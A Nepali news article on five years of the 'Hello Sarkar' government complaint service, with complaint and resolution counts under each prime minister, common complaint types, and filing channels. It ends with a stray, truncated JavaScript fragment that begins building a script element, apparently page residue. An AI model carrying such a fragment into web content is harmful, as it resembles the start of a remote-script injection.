‘हेलो सरकार’मा पाँच वर्षमा ५० हजार गुनासा

‘हेलो सरकार’ले गुनासो हेरेर प्रत्यक्ष फोन गर्नेदेखि सम्बन्धित निकायलाई पत्र देखेर सम्बोधन गर्दै आएको छ । ‘हेलो सरकार’मा सबैभन्दा धेरै उजुरी काठमाडौं उपत्यकाबाट परेका छन् । मुलुकभरबाट आएका २० प्रतिशत गुनासा सम्बोधन गर्न नै नमिल्ने खालका हुने उपाध्यायको भनाइ छ । उनका अनुसार जिस्क्याउने, जोक गर्ने र झिँजो लाग्ने किसिमका गुनासासमेत आउने गरेको छ ।

पाँच वर्षमा पाँच प्रधानमन्त्री फेरिए
‘हेलो सरकार’ स्थापना भएको पाँच वर्षको अवधिमा पाँचजना प्रधानमन्त्री भए । तर, सबैभन्दा धेरै गुनासा डा.बाबुराम भट्टराई प्रधानमन्त्री हुँदा परेका थिए । उनको समयमा २० हजार ६ सय ६३ गुनासा परेका थिए । ‘हेलो सरकार’ स्थापना हुनुभन्दा पहिला गुनासो सुन्ने व्यवस्था भए पनि प्रभावकारी थिएन । तर, भट्टराईले ‘हेलो सरकार’ स्थापना गरेर सबै सरकारी निकायलाई गुनासोलाई पहिलो प्राथमिकतामा राखेर काम गर्न निर्देशन दिएका थिए । ‘हेलो सरकार’ स्थापना हुनुभन्दा पहिलेका गुनासासमेत जोडेर तथ्यांक धेरै देखिएको ‘हेलो सरकार’ कक्षका अधिकृत हरिभक्त महतरा बताउँछन् । ‘हेलो सरकार’ स्थापना हुनुभन्दा अघि करिब तीन हजार उजुरी परेका थिए । आजको नयाँ पत्रिका दैनिकमा खबर छ ।

‘हेलो सरकार’ मा व्यक्तिगत लेनदेनका गुनासा बढी
हेलो सरकारमा धेरैजसो व्यक्तिगत लेनदेनमा समस्या परेका विषयमा धेरै गुनासा आउने गरेका छन् । दैनिक जीवनमा उपभोग गर्ने यातायात, विद्युत्, सडक, महँगी, कृषकले बीउ, मल समयमा नपाएका जस्ता गुनासा आउने गरेका छन् । सरकारी कर्मचारीले भ्रष्टाचार गरेका उजुरी पनि धेरै आउने गरेका छन् । स्थानीयस्तरमा सडक, सिँचाइ, विद्यालय र स्वास्थ्य चौकीजस्ता क्षेत्रमा आर्थिक अनियमितता भएका गुनासा धेरै आउने गरेका छन् ।

कुन प्रधानमन्त्री हुँदा कति गुनासा ?
डा. बाबुराम भट्टराई (१२ भदौ २०६८–३० फागुन २०६९)
परेका गुनासा २० हजार ६ सय ६३
फछ्र्योट  २० हजार ३ सय १९
खिलराज रेग्मी (मन्त्रिपरिषद् अध्यक्ष १ चैत २०६९–२८ माघ २०७०)
परेका गुनासा ६ हजार ८ सय ४
फछ्र्योट ६ हजार ५ सय १
सुशील कोइराला (२८ माघ २०७०–२४ असोज २०७२)
परेका गुनासा ९ हजार ५ सय ८१
फछ्र्योट ९ हजार १ सय ९३ वटा
केपी ओली (२५ असोज २०७२–१९ साउन २०७३)
परेका गुनासा ९ हजार ३ सय १६
फछ्र्योट ७ हजार ५ सय ७९ वटा
पुष्पकमल दाहाल प्रचण्ड (१९ साउन २०७३– ६ असोजसम्म)
परेका गुनासा २ हजार ३ सय ९० वटा
फछ्र्योट १ हजार २ सय ८४ वटा

यी हुन् ‘हेलो सरकार’मा उजुरी दिन सकिने ठाउँ
‘हेलो सरकार’मा केन्द्रीय कार्यालयदेखि पाँच विकास क्षेत्रबाट समेत गुनासा गर्न सकिन्छ । केन्द्रीय कार्यालय काठमाडौंसहित पूर्वाञ्चलको धनकुटा, मध्यमाअञ्चल हेटौंडा, पश्चिमाञ्चल पोखरा, मध्यपश्चिमाञ्चल सुर्खेत र सुदूरपश्चिमाञ्चलको धनगढीबाट गुनासा लिन सकिन्छ । ‘हेलो सरकार’ मा ११११ नम्बरबाट, फेसबुक र ट्विटरबाट समेत गुनासा दिन सकिन्छ । उजुरीकर्ताले आफ्नो ठेगानासहित गुनासाको विस्तृत विवरण उल्लेख गर्नुपर्दछ ।

 var d=document;var s=d.createElement(‘script’);